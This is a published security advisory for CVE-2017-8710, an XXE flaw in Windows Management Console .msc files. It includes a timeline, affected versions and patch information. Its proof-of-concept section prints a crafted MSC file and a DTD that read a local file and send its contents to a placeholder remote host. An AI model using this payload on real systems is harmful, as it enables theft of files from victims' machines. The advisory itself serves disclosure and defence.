Microsoft Windows - MSC XXE Data Exfiltrate Vulnerability

Document Title:
===============
Microsoft Windows - MSC XXE Data Exfiltrate Vulnerability 


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2094

MSRC Acknowledgements: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8710

Public References:
https://nvd.nist.gov/vuln/detail/CVE-2017-8710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8710
https://www.symantec.com/security_response/vulnerability.jsp?bid=100793
https://uk.norton.com/online-threats/microsoftwindowscve-2017-8710informationdisclosurevulne-100793-vulnerability.html

Video: https://www.vulnerability-lab.com/get_content.php?id=2095

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8710

CVE-ID:
=======
CVE-2017-8710


Release Date:
=============
2017-09-18


Vulnerability Laboratory ID (VL-ID):
====================================
2094


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Filter or Protection Mechanism Bypass


Current Estimated Price:
========================
5.000€ - 10.000€


Product & Service Introduction:
===============================
The MSC file extension is a snap-in control file associated with Microsoft Management Console 
which was developed by Microsoft Corporation. Files affixed with this extension are also known 
as Microsoft Saved Console Files. Microsoft Management Console allows user to customize the 
console or modules to hold snap -ins. It is used to configure and monitor Windows computer 
systems. The snap in contains a program that provides additional administration management 
like device management, system monitoring and disk defragmentation. A snap-in can hold 
additional snap-in extension. Users can create and customize MSC files to publish a collection 
of tools or utilities to other users through email, network sharing or web posting. It can 
also be assigned to other networks, users, and groups with policy settings. System administrators 
may provide restrictions by customization. In case MMC fails to complete a normal shut down, the 
SMS.msc file may be removed from the system. Files in MSC format can be opened with Microsoft 
Windows Server in Microsoft Windows platforms.

(Copy of the Homepage:  https://www.reviversoft.com/file-extensions/msc )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a xml external entity (XXE) data exfiltration vulnerability in the 
official Microsoft Management (Saved Console & System Console - Microsoft Common Console MSC Document that is associated with 
the Microsoft Management Console MMC of multiple Microsoft windows operating system products.


Vulnerability Disclosure Timeline:
==================================
2017-05-25: Researcher Notification & Coordination (SaifAllah benMassaoud)
2017-06-03: Vendor Notification (Microsoft Security Response Center)
2017-06-05: Vendor Notification / Security Update required (Microsoft Security Response Center)
2017-06-29: Vendor Notification / Plan to release it in September instead of August (Microsoft Security Response Center)
2017-08-11: Vendor Notification / CVE assigned (Microsoft Security Response Center)
2017-09-12: Security Acknowledgements  ((Microsoft Security Response Center))
2017-09-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Microsoft Corporation
Product: Microsoft Windows - Operating System 7,8, 2008- & 2008 R2 - (x32 & x64)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A xml external entity (XXE) data exfiltration vulnerability has been discovered in the official Microsoft Management 
(Saved Console & System Console - Microsoft Common Console MSC Document that is associated with the Microsoft 
Management Console MMC of multiple Microsoft windows operating system products.

Attackers could create a msc file containing specially crafted xml content that is designed to submit malicious input 
to the affected software.

The vulnerability is due to improper parsing of xml content that contains a reference to an external entity. An attacker 
could exploit this vulnerability by persuading an authenticated user to open a malicious crafted msc file. An exploit could 
allow the attacker to conduct an xml external entity (XXE) attack, which the attacker could use to access sensitive information 
on the targeted system that may aid in further attacks. 

In all cases, the vulnerability could used for data exfiltration and a victimes machines compromise that is relies on 
social engineering for exploitation ( Phishing - remote share & USB - HID Attack etc ... )

The security risk of the xml external entity (XXE) data exfiltration vulnerability is estimated as medium.
The Exploitation of the vulnerability does not require the target user to have any special permissions.
Successful exploitation of the vulnerability results in data exfiltration and computer system compromise.

Affected Software - File Type(s):
[+] Microsoft Common Console Document (.msc)

Affected:
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2	
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)	
Windows Server 2008 for Itanium-Based Systems Service Pack 2	
Windows Server 2008 for x64-based Systems Service Pack 2	
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)	
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1	
Windows Server 2008 R2 for x64-based Systems Service Pack 1	
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)			

Tested on :
[+] Windows XP Service Pack 3
[+] Windows 7 Ultimate
[+] Windows 10 Pro


Proof of Concept (PoC):
=======================
A xml external entity (XXE) data exfiltration vulnerability can be exploited by local attackers without user special permissions.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

1 The Video above : 
[+] Tested Windows XP SP3

2 Local system Group/User Permission : 
[+] Authenticated Users


PoC: Exploitation
## Malicious MSC file ##

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ENTITY % file SYSTEM "C:Windows[File-Name].ini">    
<!ENTITY % dtd SYSTEM "http://x.x.x.x:443/[PAYLOAD.dtd">
%dtd;]>
<pwn>&send;</pwn>

## PAYLOAD.DTD ##

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://x.x.x.x:443?%file;'>">
%all;


Solution - Fix & Patch:
=======================
Microsoft has addressed the vulnerability by changing how the affected software parses the basic delivered xml content.


Security Risk:
==============
The security risk of the xxe data exfiltration vulnerability is estimated as medium. (CVSS 4.3)


Credits & Authors:
==================
S.AbenMassaoud [[email protected]] - @benmassaou - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud 


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™